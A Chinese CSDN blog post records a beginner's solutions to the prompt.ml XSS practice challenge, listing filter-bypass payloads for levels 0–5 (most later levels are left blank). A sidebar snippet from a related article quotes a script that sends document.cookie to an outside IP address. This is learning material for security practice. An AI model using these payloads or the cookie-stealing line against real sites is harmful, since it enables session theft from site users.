初学XSS----2

最新推荐文章于 2021-08-23 22:11:08 发布
最新推荐文章于 2021-08-23 22:11:08 发布
阅读量171 收藏
点赞数 1
分类专栏: web安全 文章标签: XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42192672/article/details/86634727
版权

经过了昨天的洗礼,今天换了个网站看一下

链接:http://prompt.ml/1

0、无过滤:"><script>prompt(1)</script>

1、过滤了</xxx>这种:<img οnerrοr=prompt(1) src=1 就行,没毛病

2、过滤[=(]:我们需要的括号用html编码搞定 <svg><script>prompt&#40;1) </script>

3、->过滤为_:--!><script>prompt(1)</script> 

4、

5、>|on.+?=|focus替换为_:type可以被我们覆盖掉,想的是直接改成img 然后onerror 可是没有等号前on.+?=|focus这顿操作让我们没法输入东西,但是我们有换行符

payload:  " type=image src onerror
                ="prompt(1)

6、

7、

8、

9、

A、

B、

C、

D、

E、

F、

xiaoyuyulala
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全--XSS(跨站脚本攻击)
bobo_milk的博客
11-14 813
攻击者向web页面插入恶意可执行脚本代码,当用户浏览该页面时,嵌入到web页面的恶意代码就会被执行,从而达到攻击者盗取用户信息或侵犯用户安全隐私的目的。存储型:代码存放在服务器中,一般在个人信息或留言等地方,每当访问该页面就会触发代码(具有很高隐蔽性)DOM型:处理后的结果会成为页面的一部分,不提交数据到服务器,从客户端获得DOM中的数据在本地执行。存储型:发送一次带有xss代码的请求,以后在这个页面数据包都会有xss代码。反射型:发送一次带有xss代码的请求,只在当前数据包会有xss代码。
初学XSS----1
qq_42192672的博客
01-23 383
最近看html5的canvas看得有点不开心,正好想接触一下简单的XSS这类web安全,就来学习一波 首先我搜集了一下XSS是啥 百度百科如下 emmmm,大概有些概念了呢,不过还是似懂非懂,感觉主要就是诱骗和恶意修改 开始练习一下,从基础开始吧,链接:https://alf.nu/alert1 第一题: The code below generates HTML in an un...
xss跳转代码_XSS跨站脚本攻击-靶场writeup&总结
weixin_39963819的博客
11-21 544
XSS简介XSS(跨站脚本攻击)是指攻击者在网页中嵌入客户端脚本,通常是Javascript编写的恶意代码,当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将在用户的浏览器上被解析执行。XSS Education环境搭建docker search xss # 搜索docker镜像,找到xss education对应的image docker run -d -p {p}:80 {sha} # {...
kali linux 2.0 web 渗透测试 电子书
weixin_33888907的博客
06-01 438
打起精神,重新开启订阅号的原创文章写作工作,但是需要点时间,请耐心等待。 求资料的同学,没有及时回复的,请再次留言,我会尽快处理。今天分享两本电子书,虽然是英文的,但是难度不高。 第一本是基于Kali 2.0 的web渗透测试 链接: pan.baidu.com/s/1slLgAAD 密码: 8gvn 第二本是基于Hadoop的大数据取证技术 链接: pan.baidu.com/s/1qY37DM...
BugKu Web WriteUp
AlexYoung28的博客
08-24 2200
Web 8 这道题的代码和前面的文件包含写的思路一样, 我们都是运用  php://input 写,来实现我们从文件中读出的数据和我们传入的数据一样。 我写的如下:  只要保证  $ac  的值 和我们写入文件  $fn 的值 一样即可, 我这里都写的是 123 细心 这道题刚开始看到主页之后,又看了源代码和抓了包,发现都没有什么特别的地方,所以,只有拿御剑扫描一下后台。 ...
白帽子之web漏洞--xss攻击
鼓浪屿岛与海的博客
12-04 473
本文仅供学习,不支持一切以不法利益为目的的商业攻击 一.xss攻击原理 xss 是“跨站脚本攻击”,是一种注入攻击,当web应用对用户输入过滤的不严格时,攻击者写入恶意的脚本(CSS,HTML,JavaScript)到网页中时,如果访问了含有恶意代码的页面,恶意脚本就会被浏览器解析执行导致用户被攻击 二.常见xss危害 cookie窃取,session劫持,钓鱼攻击,蠕虫,ddos等。 ...
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
安装xss-labs ppt手册
10-22
**XSS漏洞详解与XSS-Labs安装指南** XSS(Cross Site Scripting),即跨站脚本攻击,是网络安全领域常见的一种攻击方式。它允许攻击者通过注入恶意脚本到网页中,使得用户在不知情的情况下执行这些脚本,从而获取...
WEB渗透学习-XSS-labs靶场
04-20
**XSS(跨站脚本攻击)学习指南:XSS-labs靶场详解** XSS,全称为Cross-Site Scripting,是网络安全领域常见的漏洞类型之一。它允许攻击者通过注入恶意脚本到Web页面中,进而对用户浏览器进行操控。XSS-labs是一个...
fuzzdb-master.zip
最新发布
01-06
2. **文本文件**:这些文件包含预定义的字符串或模式,用于模拟用户输入,比如常见的SQL注入探测字符串、跨站脚本(XSS)payloads、命令注入尝试等。 3. **文档**:可能包含关于如何使用FuzzDB的说明,以及对各种...
第一节 没有过滤的XSS-01
09-15
这里推荐的是由日本安全研究员创建的XSS练习靶场——[XSS-Quiz.int21h.jp](https://xss-quiz.int21h.jp/)。这个平台提供了各种XSS挑战,帮助初学者了解并熟悉XSS漏洞的检测和利用方法。 ### 2. HTML中文本标签b介绍...
做了一个XSS的闯关游戏,攻略贴上来
yd0str
12-13 8744
游戏地址: http://xss-quiz.int21h.jp 第一关:比较简单,直接输入 http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9 第二关:也相对简单,闭合标签 http://xss-quiz.int21h.jp/stage2.php?sid=f2d7d60125bdddb20
ctf入门(转载)
wxy201008的博客
08-28 2126
CTF入门指南(0基础) ctf入门指南 如何入门?如何组队? capture the flag 夺旗比赛 类型: Web 密码学 pwn 程序的逻辑分析,漏洞利用windows、linux、小型机等 misc 杂项,隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据 reverse 逆向windows、linux类 ppc 编程类的 国内外著名比赛 国外: 国内:xctf联赛 0ctf上海国...
xss-labs 通关笔记
Ewige的博客
06-30 471
靶场地址:传送门 概述: XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 反射型XXS是一种非持久性的攻击,它指的是恶意攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的目的。这里插入的恶意代码并没有保存在目标网站,需要引诱用户点击一个链接到目标网站的恶意链接来实施攻击。 原文链接:ht
网络信息安全攻防学习平台-脚本关 writeup
热门推荐
4ct10n
09-17 2万+
1.key又又找不到了直接burpsuit截断 出flag key is : yougotit_script_now2 .快速口算这道题比较有意思 在两秒钟之内回答他的算术题 思路:直接编写python脚本访问网站,获取html计算算式,得出答案,post传参,注意要建立长连接。 代码如下:#-*-coding:utf-8-*- import requests, re url = '
黑客零基础第三章-Web漏洞利用实战-vulnhub:xss_and_mysql_file
ShadowBlade
08-23 3589
第七节内容讲述了XSS漏洞和原理,并在DVWA上进行了盗取cookie的实验。本节以实战的方式,结合vulnhub靶机xss_and_mysql_file让大家体验如何用XSS截获cookie进行进一步入侵。这个靶机会涉及到一点SQL注入的知识,但易于理解。后续章节会给大家着重讲解SQL注入。 <script>new Image().src="http://192.168.17.4/test.php?output="+document.cookie;</scr
XSS渗透测试
m0_51426816的博客
02-25 758
渗透测试基本原理:依据渗透策略生成攻击向量,提交给Web服务器,然后根据Web服务器返回的网页来判断相应的检测点是否存在XSS漏洞 一.渗透策略 渗透策略规定了向Web服务器提交的内容,并根据Web服务器的返回信息来决定下一步的提交方案 流程: 二.合法字符串测试 Web服务器对检测点所提交的内容做不同的处理,并返回不同的网页,根据对返回网页的分析,排除掉不可能存在XSS漏洞的检测点,从而提高检测效率 三.攻击向量测试 模拟浏览器提交表单的过程向检测点注入攻击向量。根据action、method、type
Xss挑战之旅writeup
cherrie007的博客
08-17 3500
Xss挑战之旅writeup
XSS挑战赛--Writeup(共16题)
1stPeak's Blog
06-10 2223
XSS挑战赛--解题思路 Level-1 Level-2 Level-3 Level-4 Level-5 Level-6 Level-7 Level-8 Level-9 Level-10 Level-11 Level-12 Level-13 Level-14 Level-15 Level-16 Level-1 源码: <!DOCTYPE html><!--STATUS OK-...
Yii2初学者入门指南
"yii2初学者,这是一本适合初学者的关于Yii2框架的入门书籍,作者Bill Keck。" Yii2 是一个基于组件、高性能的 PHP 框架,适用于开发 Web 2.0 应用程序。作为初学者,了解 Yii2 可以帮助你快速构建高效且易于维护的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值